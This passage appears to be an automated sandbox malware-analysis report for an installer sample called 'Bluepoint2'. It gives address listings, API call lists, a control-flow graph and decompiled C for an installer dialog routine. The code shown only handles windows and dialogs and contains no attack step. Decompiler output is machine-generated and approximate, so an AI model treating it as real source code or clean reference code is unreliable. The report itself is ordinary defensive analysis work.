                                                                                                                                    0x004055aa
                                                                                                                                    0x00000000
                                                                                                                                    0x004054b1
                                                                                                                                    0x004054bc
                                                                                                                                    0x004054bf
                                                                                                                                    0x004054c4
                                                                                                                                    0x004054c6
                                                                                                                                    0x004054ca
                                                                                                                                    0x004054da
                                                                                                                                    0x004054e4
                                                                                                                                    0x004054e6
                                                                                                                                    0x004054e9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004054cc
                                                                                                                                    0x004054cc
                                                                                                                                    0x004054d2
                                                                                                                                    0x004054d4
                                                                                                                                    0x004054d4
                                                                                                                                    0x004054d5
                                                                                                                                    0x004054d6
                                                                                                                                    0x00000000
                                                                                                                                    0x004054cc
                                                                                                                                    0x004054af
                                                                                                                                    0x0040548a
                                                                                                                                    0x004053cd
                                                                                                                                    0x00000000
                                                                                                                                    0x004053e3
                                                                                                                                    0x004053ed
                                                                                                                                    0x004053f2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405404
                                                                                                                                    0x00405409
                                                                                                                                    0x00405415
                                                                                                                                    0x00405415
                                                                                                                                    0x00405417
                                                                                                                                    0x00405426
                                                                                                                                    0x00405428
                                                                                                                                    0x0040542c
                                                                                                                                    0x0040542f
                                                                                                                                    0x00000000
                                                                                                                                    0x0040542f
                                                                                                                                    0x004053cd
                                                                                                                                    0x00405083
                                                                                                                                    0x00405088
                                                                                                                                    0x00405091
                                                                                                                                    0x00405098
                                                                                                                                    0x004050aa
                                                                                                                                    0x004050b5
                                                                                                                                    0x004050bb
                                                                                                                                    0x004050c9
                                                                                                                                    0x004050dd
                                                                                                                                    0x004050e2
                                                                                                                                    0x004050ef
                                                                                                                                    0x004050f4
                                                                                                                                    0x0040510a
                                                                                                                                    0x0040511b
                                                                                                                                    0x00405128
                                                                                                                                    0x00405128
                                                                                                                                    0x0040512b
                                                                                                                                    0x00405131
                                                                                                                                    0x00405133
                                                                                                                                    0x00405136
                                                                                                                                    0x0040513b
                                                                                                                                    0x00405140
                                                                                                                                    0x00405142
                                                                                                                                    0x00405142
                                                                                                                                    0x00405162
                                                                                                                                    0x00405162
                                                                                                                                    0x00405164
                                                                                                                                    0x00405165
                                                                                                                                    0x0040516a
                                                                                                                                    0x00405170
                                                                                                                                    0x00405174
                                                                                                                                    0x00405179
                                                                                                                                    0x00405181
                                                                                                                                    0x00405185
                                                                                                                                    0x0040518a
                                                                                                                                    0x0040518f
                                                                                                                                    0x00405197
                                                                                                                                    0x0040519a
                                                                                                                                    0x0040526a
                                                                                                                                    0x0040527d
                                                                                                                                    0x00000000
                                                                                                                                    0x004051a0
                                                                                                                                    0x004051a3
                                                                                                                                    0x004051a6
                                                                                                                                    0x004051a9
                                                                                                                                    0x004051a9
                                                                                                                                    0x004051af
                                                                                                                                    0x004051b8
                                                                                                                                    0x004051bb
                                                                                                                                    0x004051bf
                                                                                                                                    0x004051c2
                                                                                                                                    0x004051c5
                                                                                                                                    0x004051ce
                                                                                                                                    0x004051d7
                                                                                                                                    0x004051da
                                                                                                                                    0x004051dd
                                                                                                                                    0x004051e0
                                                                                                                                    0x0040521e
                                                                                                                                    0x00405241
                                                                                                                                    0x00405249
                                                                                                                                    0x00405220
                                                                                                                                    0x0040522f
                                                                                                                                    0x0040522f
                                                                                                                                    0x004051e2
                                                                                                                                    0x004051e5
                                                                                                                                    0x004051f3
                                                                                                                                    0x004051fd
                                                                                                                                    0x00405205
                                                                                                                                    0x0040520c
                                                                                                                                    0x00405217
                                                                                                                                    0x00405217
                                                                                                                                    0x004051e0
                                                                                                                                    0x0040524f
                                                                                                                                    0x00405250
                                                                                                                                    0x0040525c
                                                                                                                                    0x0040525c
                                                                                                                                    0x00405268
                                                                                                                                    0x00405283
                                                                                                                                    0x00405286
                                                                                                                                    0x004052a3
                                                                                                                                    0x00000000
                                                                                                                                    0x00405288
                                                                                                                                    0x0040528d
                                                                                                                                    0x00405296
                                                                                                                                    0x00405629
                                                                                                                                    0x0040563b
                                                                                                                                    0x0040563b
                                                                                                                                    0x00405286
                                                                                                                                    0x00000000
                                                                                                                                    0x00405268
                                                                                                                                    0x0040519a

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405627
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                    • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                                                                    • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                                                                    • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                                                                    • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 266 4040c5-4040d7 267 4040dd-4040e3 266->267 268 40423e-40424d 266->268 267->268 269 4040e9-4040f2 267->269 270 40429c-4042b1 268->270 271 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 268->271 274 4040f4-404101 SetWindowPos 269->274 275 404107-40410e 269->275 272 4042f1-4042f6 call 404610 270->272 273 4042b3-4042b6 270->273 271->270 285 4042fb-404316 272->285 277 4042b8-4042c3 call 401389 273->277 278 4042e9-4042eb 273->278 274->275 280 404110-40412a ShowWindow 275->280 281 404152-404158 275->281 277->278 302 4042c5-4042e4 SendMessageW 277->302 278->272 284 404591 278->284 286 404130-404143 GetWindowLongW 280->286 287 40422b-404239 call 40462b 280->287 288 404171-404174 281->288 289 40415a-40416c DestroyWindow 281->289 291 404593-40459a 284->291 298 404318-40431a call 40140b 285->298 299 40431f-404325 285->299 286->287 300 404149-40414c ShowWindow 286->300 287->291 294 404176-404182 SetWindowLongW 288->294 295 404187-40418d 288->295 292 40456e-404574 289->292 292->284 305 404576-40457c 292->305 294->291 295->287 301 404193-4041a2 GetDlgItem 295->301 298->299 306 40432b-404336 299->306 307 40454f-404568 DestroyWindow EndDialog 299->307 300->281 308 4041c1-4041c4 301->308 309 4041a4-4041bb SendMessageW IsWindowEnabled 301->309 302->291 305->284 310 40457e-404587 ShowWindow 305->310 306->307 311 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 306->311 307->292 313 4041c6-4041c7 308->313 314 4041c9-4041cc 308->314 309->284 309->308 310->284 338 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 311->338 339 40438b-404390 311->339 316 4041f7-4041fc call 40459d 313->316 317 4041da-4041df 314->317 318 4041ce-4041d4 314->318 316->287 321 404215-404225 SendMessageW 317->321 323 4041e1-4041e7 317->323 318->321 322 4041d6-4041d8 318->322 321->287 322->316 326 4041e9-4041ef call 40140b 323->326 327 4041fe-404207 call 40140b 323->327 336 4041f5 326->336 327->287 335 404209-404213 327->335 335->336 336->316 342 4043d1-4043d2 338->342 343 4043d4 338->343 339->338 344 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 342->344 343->344 345 404406-404417 SendMessageW 344->345 346 404419 344->346 347 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 345->347 346->347 347->285 358 404464-404466 347->358 358->285 359 40446c-404470 358->359 360 404472-404478 359->360 361 40448f-4044a3 DestroyWindow 359->361 360->284 363 40447e-404484 360->363 361->292 362 4044a9-4044d6 CreateDialogParamW 361->362 362->292 365 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 362->365 363->285 364 40448a 363->364 364->284 365->284 370 404535-40454d ShowWindow call 404610 365->370 370->292
                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238); // executed
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                                                                                                    0x004040d0
                                                                                                                                    0x004040d7
                                                                                                                                    0x0040423e
                                                                                                                                    0x00404242
                                                                                                                                    0x00404246
                                                                                                                                    0x00404248
                                                                                                                                    0x0040424d
                                                                                                                                    0x00404258
                                                                                                                                    0x00404263
                                                                                                                                    0x00404268
                                                                                                                                    0x0040426a
                                                                                                                                    0x0040426c
                                                                                                                                    0x0040426f
                                                                                                                                    0x00404274
                                                                                                                                    0x00404282
                                                                                                                                    0x0040428f
                                                                                                                                    0x00404296
                                                                                                                                    0x00404296
                                                                                                                                    0x00404297
                                                                                                                                    0x00404297
                                                                                                                                    0x0040429c
                                                                                                                                    0x004042a2
                                                                                                                                    0x004042a9
                                                                                                                                    0x004042af
                                                                                                                                    0x004042b1
                                                                                                                                    0x004042f1
                                                                                                                                    0x004042f6
                                                                                                                                    0x004042fb
                                                                                                                                    0x004042fb
                                                                                                                                    0x00404300
                                                                                                                                    0x00404309
                                                                                                                                    0x0040430b
                                                                                                                                    0x00404310
                                                                                                                                    0x00404316
                                                                                                                                    0x0040431a
                                                                                                                                    0x0040431a
                                                                                                                                    0x0040431f
                                                                                                                                    0x00404325
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404330
                                                                                                                                    0x00404336
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040433f
                                                                                                                                    0x00404347
                                                                                                                                    0x0040434c
                                                                                                                                    0x0040434f
                                                                                                                                    0x00404355
                                                                                                                                    0x0040435a
                                                                                                                                    0x0040435d
                                                                                                                                    0x00404363
                                                                                                                                    0x00404368
                                                                                                                                    0x0040436b
                                                                                                                                    0x00404371
                                                                                                                                    0x00404379
                                                                                                                                    0x0040437f
                                                                                                                                    0x00404385
                                                                                                                                    0x00404389
                                                                                                                                    0x00404390
                                                                                                                                    0x00404390
                                                                                                                                    0x00404390
                                                                                                                                    0x0040439a
                                                                                                                                    0x004043ac
                                                                                                                                    0x004043b8
                                                                                                                                    0x004043bd
                                                                                                                                    0x004043c7
                                                                                                                                    0x004043cd
                                                                                                                                    0x004043cf
                                                                                                                                    0x004043d4
                                                                                                                                    0x004043d1
                                                                                                                                    0x004043d1
                                                                                                                                    0x004043d1
                                                                                                                                    0x004043e4
                                                                                                                                    0x004043fc
                                                                                                                                    0x004043fe
                                                                                                                                    0x00404404
                                                                                                                                    0x00404419
                                                                                                                                    0x00404406
                                                                                                                                    0x0040440f
                                                                                                                                    0x00404411
                                                                                                                                    0x00404411
                                                                                                                                    0x0040441f
                                                                                                                                    0x00404430
                                                                                                                                    0x00404446
                                                                                                                                    0x0040444d
                                                                                                                                    0x00404453
                                                                                                                                    0x00404457
                                                                                                                                    0x0040445c
                                                                                                                                    0x0040445e
                                                                                                                                    0x00000000
                                                                                                                                    0x00404464
                                                                                                                                    0x00404464
                                                                                                                                    0x00404466
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040446c
                                                                                                                                    0x00404470
                                                                                                                                    0x00404495
                                                                                                                                    0x0040449b
                                                                                                                                    0x004044a1
                                                                                                                                    0x004044a3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004044c9
                                                                                                                                    0x004044cf
                                                                                                                                    0x004044d1
                                                                                                                                    0x004044d6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004044dc
                                                                                                                                    0x004044df
                                                                                                                                    0x004044e2
                                                                                                                                    0x004044f9
                                                                                                                                    0x00404505
                                                                                                                                    0x0040451e
                                                                                                                                    0x00404524
                                                                                                                                    0x00404528
                                                                                                                                    0x0040452d
                                                                                                                                    0x00404533
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040453d
                                                                                                                                    0x00404548
                                                                                                                                    0x00000000
                                                                                                                                    0x00404548
                                                                                                                                    0x00404472
                                                                                                                                    0x00404478
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040447e
                                                                                                                                    0x00404484
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040448a
                                                                                                                                    0x0040445e
                                                                                                                                    0x00404555
                                                                                                                                    0x00404561
                                                                                                                                    0x00404568
                                                                                                                                    0x00000000
                                                                                                                                    0x004042b3
                                                                                                                                    0x004042b3
                                                                                                                                    0x004042b6
                                                                                                                                    0x004042e9
                                                                                                                                    0x004042e9
                                                                                                                                    0x004042eb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004042eb
                                                                                                                                    0x004042b8
                                                                                                                                    0x004042bc
                                                                                                                                    0x004042c1
                                                                                                                                    0x004042c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004042d3
                                                                                                                                    0x004042db
                                                                                                                                    0x00000000
                                                                                                                                    0x004042e1
                                                                                                                                    0x004040e9
                                                                                                                                    0x004040e9
                                                                                                                                    0x004040ed
                                                                                                                                    0x004040f2
                                                                                                                                    0x00404101
                                                                                                                                    0x00404101
                                                                                                                                    0x00404107
                                                                                                                                    0x0040410e
                                                                                                                                    0x00404152
                                                                                                                                    0x00404158
                                                                                                                                    0x00404171
                                                                                                                                    0x00404174
                                                                                                                                    0x00404187
                                                                                                                                    0x0040418d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404193
                                                                                                                                    0x0040419e
                                                                                                                                    0x004041a0
                                                                                                                                    0x004041a2
                                                                                                                                    0x004041c1
                                                                                                                                    0x004041c1
                                                                                                                                    0x004041c4
                                                                                                                                    0x004041c9
                                                                                                                                    0x004041cc
                                                                                                                                    0x004041dc
                                                                                                                                    0x004041dd
                                                                                                                                    0x004041df
                                                                                                                                    0x00404215
                                                                                                                                    0x00404225
                                                                                                                                    0x00000000
                                                                                                                                    0x00404225
                                                                                                                                    0x004041e1
                                                                                                                                    0x004041e7
                                                                                                                                    0x00404200
                                                                                                                                    0x00404205
                                                                                                                                    0x00404207
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404209
                                                                                                                                    0x004041f5
                                                                                                                                    0x004041f5
                                                                                                                                    0x004041f7
                                                                                                                                    0x004041f7
                                                                                                                                    0x00000000
                                                                                                                                    0x004041f7
                                                                                                                                    0x004041ea
                                                                                                                                    0x004041ef
                                                                                                                                    0x00000000
                                                                                                                                    0x004041ef
                                                                                                                                    0x004041ce
                                                                                                                                    0x004041d4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004041d6
                                                                                                                                    0x00000000
                                                                                                                                    0x004041d6
                                                                                                                                    0x004041c6
                                                                                                                                    0x00000000
                                                                                                                                    0x004041c6
                                                                                                                                    0x004041ac
                                                                                                                                    0x004041b3
                                                                                                                                    0x004041b9
                                                                                                                                    0x004041bb
                                                                                                                                    0x00404591
                                                                                                                                    0x00000000
                                                                                                                                    0x00404591
                                                                                                                                    0x00000000
                                                                                                                                    0x004041bb
                                                                                                                                    0x00404179
                                                                                                                                    0x00000000
                                                                                                                                    0x00404181
                                                                                                                                    0x00404160
                                                                                                                                    0x00404166
                                                                                                                                    0x0040456e
                                                                                                                                    0x00404574
                                                                                                                                    0x00404581
                                                                                                                                    0x00404587
                                                                                                                                    0x00404587
                                                                                                                                    0x00000000
                                                                                                                                    0x00404110
                                                                                                                                    0x00404115
                                                                                                                                    0x00404121
                                                                                                                                    0x0040412a
                                                                                                                                    0x0040422b
                                                                                                                                    0x00000000
                                                                                                                                    0x00404149
                                                                                                                                    0x0040414c
                                                                                                                                    0x00000000
                                                                                                                                    0x0040414c
                                                                                                                                    0x0040412a
                                                                                                                                    0x0040410e

                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                                                                    • ShowWindow.USER32(?), ref: 00404121
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                                                                    • DestroyWindow.USER32 ref: 00404160
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00404198
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                                                                    • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                                                                    • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404581
